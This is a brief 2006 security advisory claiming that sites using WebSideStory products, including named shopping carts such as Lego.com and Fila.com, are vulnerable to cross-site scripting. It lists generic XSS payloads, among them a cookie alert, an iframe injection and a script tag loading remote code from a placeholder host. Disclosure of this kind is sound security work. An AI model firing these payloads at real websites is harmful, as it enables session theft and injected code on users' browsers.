|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Saturday, 09 December 2006 08:52 |
 ###############################################################
---------------------------- [HSC] HackersCenter IT Security Research Team ---------------------------
###############################################################
Websidestory Offers a suite of digital marketing applications: web analytics, site search, web content management and keyword bid management.
Date Found: 12/03/2006
Vendor: www.websidestory.com
This is a critical find, all users using any WebsideStory Products are at High Risk of having Cross-Site Scripting Holes. Here is a list of few of them users and we tested the sites and gound all of them are vulnerable to XSS! Search Engines and Logins are also vulnerable and few sites with Shooping Carts from WebSidestory. So if your site has this code on it
" <!--END WEBSIDESTORY CODE--> " you better check your security!
www.websidestory.com/customers/overview.html
For Example all sites under Penton Media inc. are vulnerable including Lego.com shopping Cart, Fila.com and many more!
XSS Holes:
"><plaintext>
<script>alert("XSS");</script>
<script>alert(document.cookie);</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script src=http://www.Site.com/XSS.js></script>
>"<iframe src=http://www.Site.com width=815 height=505></script>
- Need Fix? Contact www.securityforge.com
|
